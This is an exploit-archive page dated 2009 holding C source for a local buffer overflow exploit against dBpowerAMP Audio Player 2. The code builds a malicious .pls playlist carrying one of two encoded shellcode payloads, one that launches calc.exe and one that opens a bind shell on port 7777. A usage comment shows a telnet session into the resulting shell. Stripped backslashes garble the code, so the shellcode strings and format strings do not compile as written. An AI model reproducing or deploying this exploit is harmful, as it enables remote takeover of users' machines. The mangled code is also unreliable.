[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow Exploit
# Published : 2009-02-05
# Author : SimO-s0fT
# Previous Title : FeedDemon <=2.7 OPML Outline Tag Buffer Overflow Exploit
# Next Title : Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit
/*
* simo36.c
* CODED By SimO-s0fT (Morrocco-->marrakesh city)
* Home : Exploiter-ma.com
* e-mail: maroc-anti-connexion[at]hotmail.com[dot]com
*greetz : Stack & Djekmani4ever & alphanix & all friends
* dBpowerAMP Audio Player local buffer overflow exploit
*
* this feat was exploit windows trus sp2
* there is a small problem on the farm but fortunately I managed to use it
* and remember that this feat has been operating as trus win
* I test and winxp sp1 I found another problem
* example:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&& G:Documents and SettingsSimOBureau>simo simo36.pls &&&&&
&&&&& ################################################################ &&&&&
&&&&& dBpowerAMP Audio Player local buffer overflow exploit &&&&&
&&&&& Coded By SimO-s0fT &&&&&
&&&&& e-mail : simo[at]exploiter-ma[dot]com &&&&&
&&&&& ################################################################ &&&&&
&&&&& USAGE : simo36.exe simo.pls &&&&&
&&&&& [1] execute calc.exe &&&&&
&&&&& [2] execute bindshell LPORT=7777 &&&&&
&&&&& ################################################################ &&&&&
&&&&& enter 2 &&&&&
&&&&& created !! &&&&&
&&&&& openit with dBpowerAMP &&&&&
&&&&& &&&&&
&&&&& G:Documents and SettingsSimO>telnet 127.0.0.1 7777 &&&&&
&&&&& Microsoft Windows XP [version 5.1.2600] &&&&&
&&&&& Microso(C) Copyright 1985-2001 Microsoft Corp. &&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
*/
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<windows.h>
#define OFFSET 257
char header[]=
"x5bx70x6cx61x79x6cx69x73x74x5dx0dx0dx4ex75x6dx62"
"x65x72x4fx66x45x6ex74x72x69x65x73x3dx31x0dx0dx46"
"x69x6cx65x31x3dx68x74x74x70x3ax2fx2f";
// calc
char scode1[] =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex46x43x36x42x50x5ax2f";
// bind shell 7777
char scode2[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x42x31x50x42x41x6bx41x41x71x32x41x42x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x6dx39x4bx4cx32"
"x4ax5ax4bx50x4dx6dx38x6bx49x49x6fx59x6fx39x6fx35"
"x30x6cx4bx70x6cx65x74x37x54x4cx4bx42x65x47x4cx6e"
"x6bx31x6cx46x65x33x48x43x31x48x6fx6cx4bx70x4fx65"
"x48x6cx4bx73x6fx35x70x37x71x38x6bx31x59x4cx4bx46"
"x54x6ex6bx53x31x58x6ex30x31x6fx30x4fx69x4ex4cx4b"
"x34x49x50x41x64x46x67x49x51x7ax6ax46x6dx43x31x48"
"x42x5ax4bx38x74x47x4bx30x54x64x64x51x38x42x55x4b"
"x55x4ex6bx53x6fx51x34x43x31x4ax4bx50x66x4ex6bx46"
"x6cx42x6bx4cx4bx73x6fx75x4cx33x31x5ax4bx65x53x34"
"x6cx6ex6bx6dx59x30x6cx57x54x55x4cx55x31x4bx73x74"
"x71x69x4bx65x34x6ex6bx43x73x74x70x6cx4bx67x30x46"
"x6cx6cx4bx70x70x67x6cx6ex4dx6cx4bx57x30x44x48x71"
"x4ex72x48x4ex6ex50x4ex54x4ex38x6cx70x50x4bx4fx4e"
"x36x71x76x41x43x31x76x31x78x76x53x30x32x53x58x30"
"x77x44x33x57x42x63x6fx70x54x6bx4fx48x50x73x58x58"
"x4bx58x6dx6bx4cx57x4bx70x50x6bx4fx6ax76x71x4fx6d"
"x59x4bx55x65x36x6cx41x68x6dx53x38x63x32x42x75x51"
"x7ax36x62x59x6fx58x50x71x78x4ax79x34x49x4bx45x6e"
"x4dx30x57x69x6fx4ex36x52x73x41x43x62x73x76x33x51"
"x43x70x43x43x63x73x73x36x33x6bx4fx4ax70x75x36x41"
"x78x75x4ex71x71x35x36x42x73x4bx39x79x71x6cx55x70"
"x68x4fx54x75x4ax32x50x39x57x52x77x69x6fx38x56x70"
"x6ax72x30x50x51x53x65x4bx4fx58x50x55x38x6cx64x4c"
"x6dx34x6ex49x79x66x37x6bx4fx4ex36x50x53x30x55x69"
"x6fx4ax70x53x58x7ax45x41x59x4ex66x37x39x36x37x69"
"x6fx59x46x72x70x50x54x31x44x33x65x4bx4fx5ax70x4f"
"x63x51x78x38x67x50x79x38x46x43x49x32x77x4bx4fx4b"
"x66x62x75x79x6fx6ax70x45x36x30x6ax52x44x30x66x41"
"x78x32x43x72x4dx6fx79x6dx35x62x4ax42x70x70x59x74"
"x69x5ax6cx6cx49x6bx57x41x7ax32x64x6bx39x68x62x30"
"x31x6fx30x6bx43x6ex4ax6bx4ex51x52x34x6dx49x6ex62"
"x62x36x4cx5ax33x6cx4dx71x6ax65x68x6ex4bx4cx6bx4e"
"x4bx55x38x30x72x59x6ex4cx73x37x66x4bx4fx30x75x63"
"x74x39x6fx6ex36x33x6bx36x37x72x72x31x41x31x41x46"
"x31x50x6ax55x51x31x41x41x41x32x75x42x71x39x6fx48"
"x50x50x68x6cx6dx39x49x45x55x78x4ex30x53x39x6fx6b"
"x66x62x4ax79x6fx39x6fx47x47x39x6fx58x50x4ex6bx50"
"x57x4bx4cx6cx43x4bx74x70x64x6bx4fx6ax76x41x42x49"
"x6fx58x50x30x68x68x6fx6ax6ex4bx50x31x70x42x73x49"
"x6fx58x56x49x6fx78x50x61";
int main(int argc,char *argv[]){
FILE *openfile;
unsigned char *buffer;
unsigned int RET=0x7c85d568;
unsigned int offset=0;
int number=0;
printf("################################################################n");
printf(" dBpowerAMP Audio Player local buffer overflow exploitn");
printf("tCoded By SimO-s0fTn");
printf("e-mail : simo[at]exploiter-ma[dot]comn");
printf("################################################################n");
printf("USAGE : simo36.exe simo.plsn");
printf("[1] execute calc.exen");
printf("[2] execute bindshell LPORT=7777n");
printf("################################################################n");
system("color 04");
sleep(2000);
printf("enter");
scanf("%d",&number);
if((openfile=fopen(argv[1],"wb"))==NULL){
perror("cannot opening file xD");
exit(0);
}
switch(number){
case 1:
buffer = (unsigned char *) malloc (OFFSET + sizeof(RET) + strlen(scode1));
memset(buffer,0x90,OFFSET + sizeof(RET) + strlen(scode1));
offset=OFFSET;
memcpy(buffer+offset,&RET,sizeof(RET)-1);
offset+=sizeof(RET);
memcpy(buffer+offset,scode1,strlen(scode1));
offset+=strlen(scode1);
fputs(header,openfile);
fputs(buffer,openfile);
fclose(openfile);
printf("created !!nopenit with dBpowerAMP");
break;
case 2:
buffer = (unsigned char *) malloc ( OFFSET + sizeof(RET) + strlen(scode2));
memset(buffer,0x90, OFFSET + sizeof(RET) + strlen(scode2));
offset=OFFSET;
memcpy(buffer+offset,&RET,sizeof(RET));
offset+=sizeof(RET);
memcpy(buffer+offset,scode2,strlen(scode2));
offset+=strlen(scode2);
fputs(header,openfile);
fputs(buffer,openfile);
fclose(openfile);
printf("created !!n openit with dBpowerAMP");
break;
}
free(buffer);
return 0;
}
// www.Syue.com [2009-02-05]